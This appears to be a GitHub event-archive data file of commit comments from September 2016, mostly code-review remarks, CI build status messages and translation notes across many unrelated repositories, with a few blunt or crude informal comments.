{"id":"4623570119","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_build"},"payload":{"comment":{"id":19188865,"position":62,"line":790,"path":"core/Makefile","commit_id":"cb0872073947f02c2ff808f22afdb028b1fd7a39","created_at":"2016-09-27T11:28:34Z","updated_at":"2016-09-27T11:28:34Z","body":"yeap. this is wild commit... i will chop it down to required only...."}},"created_at":"2016-09-27T11:28:34Z"}
{"id":"4623570133","type":"CommitCommentEvent","actor":{"login":"DuckyDuckling"},"repo":{"name":"pragmascript/core-network"},"payload":{"comment":{"id":19188866,"position":1,"line":1,"path":"README.md","commit_id":"cfab6ad22ffd642026b0cc5ca0685afa4e935f2e","created_at":"2016-09-27T11:28:34Z","updated_at":"2016-09-27T11:28:34Z","body":"What a gay description"}},"created_at":"2016-09-27T11:28:34Z"}
{"id":"4623570312","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"Jenik-art/PycharmProjects"},"payload":{"comment":{"id":19188867,"position":1,"line":1,"path":"Test2.py","commit_id":"26abc0676cad818169a3271e63ca08561c550508","created_at":"2016-09-27T11:28:37Z","updated_at":"2016-09-27T11:28:37Z","body":"Looks good to me"}},"created_at":"2016-09-27T11:28:37Z"}
{"id":"4623570767","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188868,"position":1,"line":1,"path":"themes/cerebral-website/menu-item/_theme/menu-item_theme_islands.css","commit_id":"bfd05af08b68c0e4e73dfd30add6f5be2086284a","created_at":"2016-09-27T11:28:43Z","updated_at":"2016-09-27T11:28:43Z","body":"tag selectors is harmful, as I said before.\r\nalso shouldn't be used to override spicifity."}},"created_at":"2016-09-27T11:28:43Z"}
{"id":"4623571297","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19188871,"position":15,"line":306,"path":"backends/platform/dc/vmsave.cpp","commit_id":"418eec8c09ab2a19a8c183388953b587afe0349e","created_at":"2016-09-27T11:28:50Z","updated_at":"2016-09-27T11:28:50Z","body":"That broke it. Now it does not compile.\r\n\r\nAlso this new code is using spaces instead of tabs"}},"created_at":"2016-09-27T11:28:50Z"}
{"id":"4623572187","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188873,"position":30,"line":19,"path":"app2/urls.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:29:02Z","updated_at":"2016-09-27T11:29:02Z","body":"Where are url names??????????"}},"created_at":"2016-09-27T11:29:02Z"}
{"id":"4623572730","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19188874,"position":5,"line":5,"path":"docs/zh-cn/installation.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T11:29:10Z","updated_at":"2016-09-27T11:29:10Z","body":"少了@next"}},"created_at":"2016-09-27T11:29:10Z"}
{"id":"4623572954","type":"CommitCommentEvent","actor":{"login":"kasbah"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19188875,"position":null,"line":null,"path":null,"commit_id":"ec1adab6755eb220a90c09c5195f109632f3df2c","created_at":"2016-09-27T11:29:13Z","updated_at":"2016-09-27T11:29:13Z","body":"https://github.com/Bristol-Braille/canute-ui/commit/b81dc4081746b203d7ba942d18cc36df7a31a1df is just noise because it didn't really do anything.\r\n\r\n`git config --global --bool pull.rebase true`"}},"created_at":"2016-09-27T11:29:13Z"}
{"id":"4623573338","type":"CommitCommentEvent","actor":{"login":"christianalfoni"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188876,"position":6,"line":10,"path":"package.json","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:29:18Z","updated_at":"2016-09-27T11:29:18Z","body":"ops :)"}},"created_at":"2016-09-27T11:29:18Z"}
{"id":"4623573387","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188877,"position":60,"line":74,"path":"app2/tests.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:29:19Z","updated_at":"2016-09-27T11:29:19Z","body":"Ugly hardcode"}},"created_at":"2016-09-27T11:29:19Z"}
{"id":"4623574105","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188882,"position":60,"line":74,"path":"app2/tests.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:29:30Z","updated_at":"2016-09-27T11:29:30Z","body":"Use reverse with url names"}},"created_at":"2016-09-27T11:29:30Z"}
{"id":"4623574922","type":"CommitCommentEvent","actor":{"login":"Guria"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188885,"position":2,"line":1,"path":"themes/cerebral-website/menu-item/_theme/menu-item_theme_islands.css","commit_id":"bfd05af08b68c0e4e73dfd30add6f5be2086284a","created_at":"2016-09-27T11:29:40Z","updated_at":"2016-09-27T11:29:40Z","body":"here we use the same selector as original. bundler will add our code below library one (guaranteed). so it will be able to override it."}},"created_at":"2016-09-27T11:29:40Z"}
{"id":"4623576026","type":"CommitCommentEvent","actor":{"login":"christianalfoni"},"repo":{"name":"cerebral/cerebral-website"},"payload":{"comment":{"id":19188887,"position":4,"line":3,"path":"themes/cerebral-website/head-nav/head-nav.css","commit_id":"fa46a9a0e099c122800bac503a0d2f79512cab86","created_at":"2016-09-27T11:29:55Z","updated_at":"2016-09-27T11:29:55Z","body":"Making it minimalistic. No reason to just take up space that does nothing :)"}},"created_at":"2016-09-27T11:29:55Z"}
{"id":"4623578609","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188890,"position":6,"line":6,"path":"app2/templates/app2/item_detail.html","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:30:28Z","updated_at":"2016-09-27T11:30:28Z","body":"What about html in content . Read about template tag safe and method mark_safe"}},"created_at":"2016-09-27T11:30:28Z"}
{"id":"4623579763","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188893,"position":13,"line":48,"path":"app1/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:30:43Z","updated_at":"2016-09-27T11:30:43Z","body":"Class base view"}},"created_at":"2016-09-27T11:30:43Z"}
{"id":"4623579769","type":"CommitCommentEvent","actor":{"login":"congtou1991"},"repo":{"name":"congtou1991/SmartMagnetometer"},"payload":{"comment":{"id":19188894,"position":null,"line":null,"path":null,"commit_id":"ed69a6d1b6277fcffe2343574213e18d6fb76a11","created_at":"2016-09-27T11:30:43Z","updated_at":"2016-09-27T11:30:43Z","body":"编译环境：Arduino IDE 1.6.5  \r\n                       Boards: NodeMCU 1.0 (ESP-12E Module)"}},"created_at":"2016-09-27T11:30:43Z"}
{"id":"4623580863","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188895,"position":4,"line":32,"path":"app1/views.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:30:53Z","updated_at":"2016-09-27T11:30:53Z","body":"Class based view"}},"created_at":"2016-09-27T11:30:53Z"}
{"id":"4623582804","type":"CommitCommentEvent","actor":{"login":"vsdudakov"},"repo":{"name":"DO2016/mysite"},"payload":{"comment":{"id":19188899,"position":9,"line":59,"path":"app1/models.py","commit_id":"e6adc55b69d1d1daa2f972e843df0e099fe02c79","created_at":"2016-09-27T11:31:18Z","updated_at":"2016-09-27T11:31:18Z","body":"What the fuck?"}},"created_at":"2016-09-27T11:31:18Z"}
{"id":"4623584343","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":19188905,"position":null,"line":null,"path":null,"commit_id":"57194b0ee5c4b8f36d25cb7cf8ba84312674571a","created_at":"2016-09-27T11:31:40Z","updated_at":"2016-09-27T11:31:40Z","body":"TeamCity ReOpenLDAP :: master [Build 67](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2799&buildTypeId=ReOpenLDAP_Master&guest=1) outcome was **SUCCESS**\nSummary: Tests passed Build time: 02:04:24"}},"created_at":"2016-09-27T11:31:40Z"}
{"id":"4623584346","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"ReOpen/ReOpenLDAP"},"payload":{"comment":{"id":19188904,"position":null,"line":null,"path":null,"commit_id":"01b606df5e19f4892ef02e94e19b073737c4d07d","created_at":"2016-09-27T11:31:40Z","updated_at":"2016-09-27T11:31:40Z","body":"TeamCity ReOpenLDAP :: master [Build 67](https://binbug.bigbrother-matrix.ru/teamcity/viewLog.html?buildId=2799&buildTypeId=ReOpenLDAP_Master&guest=1) outcome was **SUCCESS**\nSummary: Tests passed Build time: 02:04:24"}},"created_at":"2016-09-27T11:31:40Z"}
{"id":"4623584864","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"rstudio/rmarkdown"},"payload":{"comment":{"id":19188908,"position":null,"line":null,"path":null,"commit_id":"707cbc92a0e5e9cc4f0b81453916394f4fbe70c2","created_at":"2016-09-27T11:31:48Z","updated_at":"2016-09-27T11:31:48Z","body":"@hadley "}},"created_at":"2016-09-27T11:31:48Z"}
{"id":"4623585297","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19188911,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-27T11:31:55Z","updated_at":"2016-09-27T11:31:55Z","body":"S(0, 25) is PAWN, S(40,62) is KNIGHT, S(40, 59) as BISHOP S(0, 34),is, ROOK\r\nFor the above the bonus is given only if the target is not pawn-protected.\r\nand finally S(35, 48  is QUEEN"}},"created_at":"2016-09-27T11:31:55Z"}
{"id":"4623586370","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19188913,"position":267,"line":630,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-27T11:32:12Z","updated_at":"2016-09-27T11:32:12Z","body":"Thanks for the help, I am going to change that "}},"created_at":"2016-09-27T11:32:12Z"}
{"id":"4623588023","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19188916,"position":5,"line":5,"path":"docs/zh-cn/essentials/getting-started.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T11:32:35Z","updated_at":"2016-09-27T11:32:35Z","body":"没翻译：Here's a basic example"}},"created_at":"2016-09-27T11:32:35Z"}
{"id":"4623588224","type":"CommitCommentEvent","actor":{"login":"mattvenn"},"repo":{"name":"Bristol-Braille/canute-ui"},"payload":{"comment":{"id":19188917,"position":null,"line":null,"path":null,"commit_id":"ec1adab6755eb220a90c09c5195f109632f3df2c","created_at":"2016-09-27T11:32:37Z","updated_at":"2016-09-27T11:32:37Z","body":"ok, I did that command, now I just carry on as normal?\n\nOn 27 September 2016 at 13:29, Kaspar Emanuel <notifications@github.com>\nwrote:\n\n> b81dc40\n> <https://github.com/Bristol-Braille/canute-ui/commit/b81dc4081746b203d7ba942d18cc36df7a31a1df>\n> is just noise because it didn't really do anything.\n>\n> git config --global --bool pull.rebase true\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Bristol-Braille/canute-ui/commit/ec1adab6755eb220a90c09c5195f109632f3df2c#commitcomment-19188875>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAmtbOcEFSDaSOP0C_skOE7DsUBI75ERks5quP4JgaJpZM4KHe0j>\n> .\n>\n\n\n\n-- \nMatthew Venn\nweb mattvenn.net twitter @matthewvenn <https://twitter.com/matthewvenn>\n"}},"created_at":"2016-09-27T11:32:37Z"}
{"id":"4623588547","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188918,"position":null,"line":null,"path":null,"commit_id":"bfd8758e4d4459576f9ec0893075d4e1f3032898","created_at":"2016-09-27T11:32:42Z","updated_at":"2016-09-27T11:32:42Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 144](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1240&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-27T11:32:42Z"}
{"id":"4623589506","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"Nagarei/DxLibEx"},"payload":{"comment":{"id":19188920,"position":null,"line":null,"path":null,"commit_id":"4b35178066249ef3d5623920ef48aea9e5cc095f","created_at":"2016-09-27T11:32:56Z","updated_at":"2016-09-27T11:32:56Z","body":"それもそうですね。了解です。"}},"created_at":"2016-09-27T11:32:56Z"}
{"id":"4623592156","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188926,"position":null,"line":null,"path":null,"commit_id":"bfd8758e4d4459576f9ec0893075d4e1f3032898","created_at":"2016-09-27T11:33:35Z","updated_at":"2016-09-27T11:33:35Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 144](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1240&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:50"}},"created_at":"2016-09-27T11:33:35Z"}
{"id":"4623594166","type":"CommitCommentEvent","actor":{"login":"alankelly"},"repo":{"name":"NumScale/boost.simd"},"payload":{"comment":{"id":19188929,"position":64,"line":64,"path":"include/boost/simd/arch/x86/avx/simd/function/deinterleave.hpp","commit_id":"b8458ae8a23ebc307b7e3ab5d2ac15d85968d16b","created_at":"2016-09-27T11:34:05Z","updated_at":"2016-09-27T11:34:05Z","body":"So looks like it's passing by here:\r\nhttps://github.com/NumScale/boost.simd/blob/develop/include/boost/simd/arch/common/generic/function/bitwise_cast.hpp\r\nwhich explains this behavior. I think we need an avx bitwise cast from floating to floating which just returns the input to catch this case. The integer case is dealt with by an intrinsic. I will look at other architectures as well."}},"created_at":"2016-09-27T11:34:05Z"}
{"id":"4623594741","type":"CommitCommentEvent","actor":{"login":"vijaymetatagg"},"repo":{"name":"vijaymetatagg/mytest"},"payload":{"comment":{"id":19188930,"position":null,"line":null,"path":null,"commit_id":"28a9fdbed54b09a89778ca5a0a145259b689aaad","created_at":"2016-09-27T11:34:13Z","updated_at":"2016-09-27T11:34:13Z","body":"Usability changes."}},"created_at":"2016-09-27T11:34:13Z"}
{"id":"4623595204","type":"CommitCommentEvent","actor":{"login":"Jagged"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19188931,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-27T11:34:20Z","updated_at":"2016-09-27T11:34:20Z","body":"It all comes down to a design decision - do we allow inheritance or not.  That (ideally) should be driven by use-cases, and ultimately unit tests to prove we meet those use-cases.  It was you that convinced me to go back to using `is` for flexibility, so I'd like to keep that if poss.  eg. OneOf<Success,Exception>, where Exception could be many types of exceptions.  Expect me to hassle you if you've changed your mind! lol\r\n\r\nHmm, I really dislike ambiguous types.  I think we should refuse/fail if someone tries to do something like you mentioned, which we can do via the static constructor.  It's supposed to be *ONE* of them.  That doesn't mean we necessarily disallow inheritance, just that the Tn's cannot be derived from any of the other Tn's.  eg  OneOf<Child1,Child2> is OK, but OneOf<Parent,Child> is not.\r\n\r\nThoughts?\r\n\r\nps. I felt removing index helped maintainability, which for me has a higher priority over optimisation at this point.  Anyone writing a game or other time-sensitive code would probably be mad using OneOf, it's better suited for line-of-business kind of code.  eg website backend stuff.  But, maybe I'm wrong?  If there's a strong enough case for it we could reintroduce it, but then also for optimisation sake we may need to go back to the original Match and Switch methods to avoid the overheads of calling `When` multiple times.  At that point we might as well give up.  So, thinking on it, this version of OneOf is aiming at compile-time checks and ease-of-use from a developer's viewpoint, at the slight expense of a few cpu cycles.  I can live with that.  I value my time over the cpus!"}},"created_at":"2016-09-27T11:34:20Z"}
{"id":"4623595420","type":"CommitCommentEvent","actor":{"login":"jasonliul"},"repo":{"name":"henrypp/wfptool"},"payload":{"comment":{"id":19188932,"position":null,"line":null,"path":null,"commit_id":"206273ce32e2d0fd528b7e7aa6d5a154d30154dd","created_at":"2016-09-27T11:34:22Z","updated_at":"2016-09-27T11:34:22Z","body":"[B]henrypp[/B] \r\nFrench Translation[French&Canadian], credit to [B]jordan4x[/B]\r\n[url]https://www.upload.ee/files/6200635/French.rar.html[/url]"}},"created_at":"2016-09-27T11:34:22Z"}
{"id":"4623598565","type":"CommitCommentEvent","actor":{"login":"silaev"},"repo":{"name":"silaev/temp1"},"payload":{"comment":{"id":19188938,"position":5,"line":5,"path":"index.html","commit_id":"10bef1c5ca035666ebffbc969e5c4a1b44d7450c","created_at":"2016-09-27T11:35:07Z","updated_at":"2016-09-27T11:35:07Z","body":"I was truing to be funny"}},"created_at":"2016-09-27T11:35:07Z"}
{"id":"4623601201","type":"CommitCommentEvent","actor":{"login":"HughAJWood"},"repo":{"name":"rencoreab/sharepoint-sonarqube"},"payload":{"comment":{"id":19188942,"position":null,"line":null,"path":null,"commit_id":"32ad7c4fb2692c933dc9e4158eeb8a443ef53020","created_at":"2016-09-27T11:35:39Z","updated_at":"2016-09-27T11:35:39Z","body":"Updated version to latest 1.0.4-beta.6_5_5_2709"}},"created_at":"2016-09-27T11:35:39Z"}
{"id":"4623604839","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-drag-question"},"payload":{"comment":{"id":19188946,"position":null,"line":null,"path":null,"commit_id":"69d75abd43472fabd15f830765d029387801e0ce","created_at":"2016-09-27T11:36:24Z","updated_at":"2016-09-27T11:36:24Z","body":"76bc97702b433ae68530d2150bc8e66a3121e2dc"}},"created_at":"2016-09-27T11:36:24Z"}
{"id":"4623612553","type":"CommitCommentEvent","actor":{"login":"zeldin"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19188961,"position":15,"line":306,"path":"backends/platform/dc/vmsave.cpp","commit_id":"418eec8c09ab2a19a8c183388953b587afe0349e","created_at":"2016-09-27T11:38:12Z","updated_at":"2016-09-27T11:38:12Z","body":"\nEugene Sandulenko <notifications@github.com> writes:\n\n> That broke it. Now it does not compile.\n\nAs noted in the README (one of the previous commits), a new version of\nlibronin is now required.  I'll see if I remember how to log in to the\nbuildbot and update it...\n\n\n  // Marcus\n\n\n"}},"created_at":"2016-09-27T11:38:12Z"}
{"id":"4623616173","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19188966,"position":null,"line":null,"path":null,"commit_id":"463921af68e7c1dc15eca0eb53025501a0e0b27f","created_at":"2016-09-27T11:39:02Z","updated_at":"2016-09-27T11:39:02Z","body":":laughing: Let's a Holy War begin! :feelsgood:"}},"created_at":"2016-09-27T11:39:02Z"}
{"id":"4623617444","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19188968,"position":270,"line":633,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-27T11:39:21Z","updated_at":"2016-09-27T11:39:21Z","body":"I wont add it then, maybe we will not need it for the future weather widgets.  "}},"created_at":"2016-09-27T11:39:21Z"}
{"id":"4623618673","type":"CommitCommentEvent","actor":{"login":"vijaymetatagg"},"repo":{"name":"umang-dev/mytest"},"payload":{"comment":{"id":19188970,"position":null,"line":null,"path":null,"commit_id":"7ece14dc7f5fb4cf8f469cb18c3d29b0ece92631","created_at":"2016-09-27T11:39:38Z","updated_at":"2016-09-27T11:39:38Z","body":"test4 development"}},"created_at":"2016-09-27T11:39:38Z"}
{"id":"4623621415","type":"CommitCommentEvent","actor":{"login":"bebef1987"},"repo":{"name":"mozilla/moz-grid-config"},"payload":{"comment":{"id":19188976,"position":null,"line":null,"path":null,"commit_id":"9b527586a5e97fc7f2043d4eac8a8da0f7d91867","created_at":"2016-09-27T11:40:15Z","updated_at":"2016-09-27T11:40:15Z","body":"Uh... did not knew that... I will test it with `selenium.classname `\r\n\r\nThanks for the help"}},"created_at":"2016-09-27T11:40:15Z"}
{"id":"4623623987","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188983,"position":null,"line":null,"path":null,"commit_id":"14d64a8c222309b7c04d2efb0046a77bc9beb419","created_at":"2016-09-27T11:40:50Z","updated_at":"2016-09-27T11:40:50Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 145](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1241&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-27T11:40:50Z"}
{"id":"4623625525","type":"CommitCommentEvent","actor":{"login":"azatyan"},"repo":{"name":"symfony-armenia/php-lessons"},"payload":{"comment":{"id":19188984,"position":10,"line":10,"path":"lessons/1.md","commit_id":"2b21ad015e6fd7e8557b6c9a464de7667507b17c","created_at":"2016-09-27T11:41:12Z","updated_at":"2016-09-27T11:41:12Z","body":"@MartinElizbaryan  write it today! [HOT]"}},"created_at":"2016-09-27T11:41:12Z"}
{"id":"4623626867","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19188987,"position":null,"line":null,"path":null,"commit_id":"14d64a8c222309b7c04d2efb0046a77bc9beb419","created_at":"2016-09-27T11:41:30Z","updated_at":"2016-09-27T11:41:30Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 145](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1241&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:40"}},"created_at":"2016-09-27T11:41:30Z"}
{"id":"4623628562","type":"CommitCommentEvent","actor":{"login":"hwangsusie"},"repo":{"name":"teokimpeng/ICBS_BA1820_Project"},"payload":{"comment":{"id":19188992,"position":7,"line":17,"path":"testinitialcommit.Rmd","commit_id":"5b40d117075b1dc7f5754cd617521bcada23c42f","created_at":"2016-09-27T11:41:55Z","updated_at":"2016-09-27T11:41:55Z","body":"+2) Suji Hwang "}},"created_at":"2016-09-27T11:41:55Z"}
{"id":"4623633529","type":"CommitCommentEvent","actor":{"login":"Ninos"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189001,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:43:02Z","updated_at":"2016-09-27T11:43:02Z","body":"@nuxwin owncloud instances are working fine on my server with this directive. Surely he did not installed owncloud correctly or had additional configurations.."}},"created_at":"2016-09-27T11:43:02Z"}
{"id":"4623633780","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189002,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T11:43:06Z","updated_at":"2016-09-27T11:43:06Z","body":"It's a bit harder for me ... 4 tuners.\r\nBut from what I can see, it's all fine."}},"created_at":"2016-09-27T11:43:06Z"}
{"id":"4623634299","type":"CommitCommentEvent","actor":{"login":"zeldin"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19189004,"position":15,"line":306,"path":"backends/platform/dc/vmsave.cpp","commit_id":"418eec8c09ab2a19a8c183388953b587afe0349e","created_at":"2016-09-27T11:43:13Z","updated_at":"2016-09-27T11:43:13Z","body":"Hm, no, I guess not:\r\n> ssh: connect to host buildbot.scummvm.org port 2222: Connection refused\r\n\r\nAny idea how to get into the buildbot?"}},"created_at":"2016-09-27T11:43:13Z"}
{"id":"4623635317","type":"CommitCommentEvent","actor":{"login":"simonpucher"},"repo":{"name":"simonpucher/AgenaTrader"},"payload":{"comment":{"id":19189007,"position":null,"line":null,"path":null,"commit_id":"78c75c98ab7559289c92b7c697f73a603d309ff2","created_at":"2016-09-27T11:43:28Z","updated_at":"2016-09-27T11:43:28Z","body":"Servus,\r\n\r\nden Timeframe kannst du bei Indikatoren einfach über den Konstruktor übergeben.\r\nAlles mit dem Kategorie Etikett Parameters kommt dann in den Konstruktor.\r\n=> [Category(\"Parameters\")]\r\n\r\nAm Beispiel der ATR: http://www.tradeescort.com/AgenaScriptHelp/AgenaScript.html?AverageTrueRangeATR.html\r\nDie Daten des Timeframes kannst du dann über die iDataSeries übergeben.\r\nATR(int period)\r\nATR(IDataSeries input, int period)\r\n\r\nDie unterschiedlichen TimeFrames kannst du ganze einfach über MultiBar lösen. Du ladest dir alle TimeFrames im InitRequirements event und greifst dann im OnBarUpdate darauf zu. \r\n\r\nprotected override void InitRequirements()\r\n        {\r\n            Add(new TimeFrame(DatafeedHistoryPeriodicity.Day, 1));\r\n        }\r\n\r\nIn Zukunft wird es noch mehr Tutorials im offiziellen AgenaTrader GitHub Projekt geben. Wir können sicherlich auch so ein Beispiel zusammen erstellen."}},"created_at":"2016-09-27T11:43:28Z"}
{"id":"4623640201","type":"CommitCommentEvent","actor":{"login":"adamczi"},"repo":{"name":"adamczi/qgis_Zonal_Statistics"},"payload":{"comment":{"id":19189014,"position":null,"line":null,"path":null,"commit_id":"54baf548d1f6e72c1723ea513a0fd01bbf6bc153","created_at":"2016-09-27T11:44:34Z","updated_at":"2016-09-27T11:44:34Z","body":"nie init tylko windows"}},"created_at":"2016-09-27T11:44:34Z"}
{"id":"4623641875","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":19189017,"position":37,"line":163,"path":"README.rst","commit_id":"aa6eca18fb40af02c547cab6eb7866c222317a80","created_at":"2016-09-27T11:44:57Z","updated_at":"2016-09-27T11:44:57Z","body":"MacOS -> macOS 😉 \r\n\r\nPersonally I like this GUI to easily manage tunnels:\r\nhttps://codinn.com/products/ssh-tunnel/"}},"created_at":"2016-09-27T11:44:57Z"}
{"id":"4623643711","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189023,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:45:21Z","updated_at":"2016-09-27T11:45:21Z","body":"@Ninos \r\n\r\nI'll test installing Own clound and enable that directive. If all is ok, i'll re-add it."}},"created_at":"2016-09-27T11:45:21Z"}
{"id":"4623646082","type":"CommitCommentEvent","actor":{"login":"Ninos"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189026,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:45:53Z","updated_at":"2016-09-27T11:45:53Z","body":"OK +1"}},"created_at":"2016-09-27T11:45:53Z"}
{"id":"4623647040","type":"CommitCommentEvent","actor":{"login":"Kyle873"},"repo":{"name":"Arks-Layer/PSNovaTranslations"},"payload":{"comment":{"id":19189028,"position":5,"line":497,"path":"skill_descriptions.json","commit_id":"51d25facc0099a335d07cccfca2c7afeed1272f9","created_at":"2016-09-27T11:46:05Z","updated_at":"2016-09-27T11:46:05Z","body":"Esacape -> Escape"}},"created_at":"2016-09-27T11:46:05Z"}
{"id":"4623649192","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189029,"position":19,"line":19,"path":"docs/zh-cn/essentials/dynamic-matching.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T11:46:35Z","updated_at":"2016-09-27T11:46:35Z","body":"改成：都将映射到相同的路由，感觉用“到”比较合适"}},"created_at":"2016-09-27T11:46:35Z"}
{"id":"4623650305","type":"CommitCommentEvent","actor":{"login":"tronatula"},"repo":{"name":"joel1st/championweb"},"payload":{"comment":{"id":19189031,"position":null,"line":null,"path":null,"commit_id":"4d84ca54a9c96456849afbc4ca99e8ad96acc719","created_at":"2016-09-27T11:46:50Z","updated_at":"2016-09-27T11:46:50Z","body":"Bug: there is no data on stat page:http://champion.gg/statistics/, your web is a mess lol"}},"created_at":"2016-09-27T11:46:50Z"}
{"id":"4623652194","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19189034,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T11:47:13Z","updated_at":"2016-09-27T11:47:13Z","body":"@Ninos \r\n\r\nCould you reopen the related ticket on our issue tracker (I don't remember which one was..) Or eventually open a new one?\r\n\r\nThanks."}},"created_at":"2016-09-27T11:47:13Z"}
